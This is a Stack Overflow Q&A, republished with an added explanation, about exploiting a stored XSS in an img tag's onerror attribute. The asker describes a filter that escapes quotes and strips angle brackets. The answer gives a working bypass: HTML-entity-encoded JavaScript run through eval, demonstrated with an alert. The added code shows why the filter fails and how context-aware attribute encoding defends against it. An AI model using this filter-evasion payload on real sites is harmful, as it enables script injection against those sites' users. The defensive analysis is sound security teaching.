Exploit the xss vulnerability with php code

I found a stored XSS. The code looks like this:

<img class="br64 mr15" onerror="this.onerror=null;this.src=`https://www.examplesite.zcs/default.png`;" width="100" height="100" src="xss is here">

The problem is that the system inserts a \ before every quotation mark I put in and deletes "<>" characters. Can I take advantage of this stored XSS?

If I get over these obstacles, I'm thinking of exiting the <img> tag I'm in and starting a <?php tag.



Solution 1:[1]

Try HTML-encoding the payload. I used https://onlinetexttools.com/html-encode-text to encode alert('1'), which yielded &#97;&#108;&#101;&#114;&#116;&lpar;&apos;&#49;&apos;&rpar;, and I simply called the eval function:

<img class="br64 mr15" src='badurl.png' onerror="eval(&#97;&#108;&#101;&#114;&#116;&lpar;&apos;&#49;&apos;&rpar;);" width="100" height="100" src="xss is here">

As you see above, there are no quotes or <> tags (though you could use them too with HTML encode).

Here is the JS Fiddle https://jsfiddle.net/2jb90g43/
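
Why the filter described in the question does not stop the encoded string from the answer, shown as an added example (not code from the original post): the browser decodes character references in attribute values after the server-side filter has already run. `weakFilter`, `encodeForHtmlAttribute`, `decodeAttributeValue` and `valueSeenByBrowser` are hypothetical names, the filter's behaviour is assumed from the question's description, and the decoder is a simplified stand-in for the HTML parser.

```javascript
// Added example; all function names are hypothetical.

// The filter as the question describes it (assumed): a backslash before each
// quotation mark, and "<" / ">" deleted.
function weakFilter(input) {
  return input.replace(/["']/g, "\\$&").replace(/[<>]/g, "");
}

// Context-aware alternative: encode every character that is significant in an
// HTML attribute value, including "&", so character references stay inert.
const ATTR_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;", "`": "&#96;" };
function encodeForHtmlAttribute(input) {
  return input.replace(/[&<>"'`]/g, (ch) => ATTR_ESCAPES[ch]);
}

// Simplified stand-in for the HTML parser: one pass over the attribute value,
// resolving numeric references and the few named ones used on this page.
const NAMED = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'", lpar: "(", rpar: ")" };
function decodeAttributeValue(value) {
  return value.replace(/&(?:#(\d+)|#x([0-9a-f]+)|([a-z]+));/gi, (ref, dec, hex, name) => {
    if (dec) return String.fromCodePoint(Number(dec));
    if (hex) return String.fromCodePoint(parseInt(hex, 16));
    return Object.prototype.hasOwnProperty.call(NAMED, name) ? NAMED[name] : ref;
  });
}

// What the browser ends up with after the sanitizer ran and the parser decoded.
function valueSeenByBrowser(sanitize, stored) {
  return decodeAttributeValue(sanitize(stored));
}

// The encoded string from the answer above.
const encoded = "&#97;&#108;&#101;&#114;&#116;&lpar;&apos;&#49;&apos;&rpar;";

console.log(weakFilter(encoded) === encoded);          // true: nothing for the filter to strip
console.log(valueSeenByBrowser(weakFilter, encoded));  // alert('1')
console.log(valueSeenByBrowser(encodeForHtmlAttribute, encoded) === encoded); // true: stays literal text
```

Attribute encoding only keeps the value as data; a value that ends up inside an event handler or a URL attribute needs context-specific handling as well, such as keeping untrusted data out of handlers and allow-listing URL schemes.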

Sources

This article follows the attribution requirements of Stack Overflow and is licensed under CC BY-SA 3.0.

Source: Stack Overflow

Solution Source
Solution 1